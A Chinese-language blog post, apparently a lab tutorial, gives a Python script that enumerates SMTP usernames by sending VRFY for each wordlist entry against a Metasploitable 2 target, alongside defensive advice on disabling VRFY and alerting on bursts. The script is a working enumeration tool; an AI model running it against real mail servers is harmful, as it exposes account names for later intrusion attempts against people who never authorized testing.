利用Python破解SMTP服务器用户名

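   本代码的运行及测试环境:在Kali Linux上运行Python代码,目标机器为Metasploitable 2,该目标运行SMTP服务。脚本通过SMTP的VRFY命令逐个验证字典中的用户名,并根据响应码判断用户名是否存在;要防止此类用户名枚举,可在邮件服务器上禁用VRFY命令(例如Postfix的 disable_vrfy_command = yes)。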

 1 import socket
 2 import optparse
 3 import os
 4 import sys
 5 import termcolor
 6 
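 class SMTPUserCrack:
     """Check which names from a wordlist an SMTP server confirms via VRFY.

     The target address, port and wordlist path come from the command line
     (see get_params).  Each candidate name is sent in its own ``VRFY``
     command, and a reply carrying status code 252 is reported as a hit.

     Defensive note: a server that answers VRFY differently for known and
     unknown names discloses its account list.  Mail servers can switch the
     command off (Postfix: ``disable_vrfy_command = yes``), and a burst of
     VRFY commands from a single client is worth alerting on in the mail log.
     """

     def __init__(self) -> None:
         # Parse the command line a single time and unpack the result,
         # instead of re-parsing argv once per attribute.
         self.target, self.port, self.filename = self.get_params()

     def get_params(self):
         """Parse ``-t/--target``, ``-p/--port`` and ``-f/--filename``.

         Returns:
             A ``(target, port, filename)`` tuple; the port defaults to 25.

         Prints a message and exits the process (status 0) when the target
         or the wordlist option is missing, or when the wordlist path does
         not exist.
         """
         parser = optparse.OptionParser('Usage: <Program> -t server IP address -p port -f wordlist of username')
         parser.add_option('-t', '--target', dest='target', type='string', help="Specify target IP address")
         parser.add_option('-p', '--port', dest='port', type='int', help="Spcify smtp server port")
         parser.add_option('-f', '--filename', dest='filename', type='string', help='Specify wordlsit')
         options, args = parser.parse_args()
         if options.target is None or options.filename is None:
             print(parser.usage)
             sys.exit(0)
         if options.port is None:
             options.port = 25
         if not os.path.exists(options.filename):
             print("[-] The file does not exist")
             sys.exit(0)
         return options.target, options.port, options.filename

     def port_scan(self):
         """Return True when a TCP connection to target:port succeeds within 2 s."""
         # The context manager closes the socket on every path, including
         # when connect_ex() raises (e.g. the host name cannot be resolved).
         with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
             s.settimeout(2)
             try:
                 # connect_ex() returns 0 on success and an errno value otherwise.
                 return s.connect_ex((self.target, self.port)) == 0
             except OSError:
                 return False

     def check_user(self, username):
         """Send ``VRFY <username>`` and report whether the server confirmed it.

         Args:
             username: Candidate name taken from the wordlist.

         Returns:
             True when a reply line starts with status code 252, otherwise
             False -- including when the connection fails or times out.
         """
         command = 'VRFY %s\n' % username
         try:
             # Creating the socket inside ``with`` guarantees it is closed and
             # avoids touching an unbound name if socket creation itself fails.
             with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
                 s.settimeout(2)
                 s.connect((self.target, self.port))
                 s.recv(1024)  # read and discard the server greeting
                 s.send(command.encode('utf-8'))
                 response = s.recv(1024).decode('utf-8', errors='replace')
         except (OSError, UnicodeError):
             # Best effort: an unreachable server, a timeout or a name that
             # cannot be encoded simply counts as "not confirmed".
             return False

         # The reply code differs when the name does not exist.  Compare the
         # code at the start of a reply line: a plain substring test would
         # also match "252" inside an echoed address or any other reply text.
         if not any(reply.startswith('252') for reply in response.splitlines()):
             return False

         print("\t[+] SMTP User Found: \t",  termcolor.colored(username,'blue'))
         return True

     def run(self):
         """Probe the port, check every wordlist entry and report the outcome."""
         if not self.port_scan():
             print("[-] The target has no SMTP service running over the port: %d" % self.port)
             # Nothing is listening, so stop here.
             return

         print("[-] The port is running smtp service: %d" % self.port)

         found_any = False
         with open(self.filename,'r') as f:
             for line in f:
                 username = line.strip()
                 if not username:
                     # Blank wordlist lines would otherwise send an empty VRFY.
                     continue
                 if self.check_user(username):
                     found_any = True

         # Every entry has been tried; report failure only if none matched.
         if not found_any:
             print("[-] Failed to crack")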
76 
77 
if __name__ == "__main__":
    # Entry point: build the checker from the command-line options, then run it.
    cracker = SMTPUserCrack()
    cracker.run()

 

posted @ 2022-05-26 18:43  Jason_huawen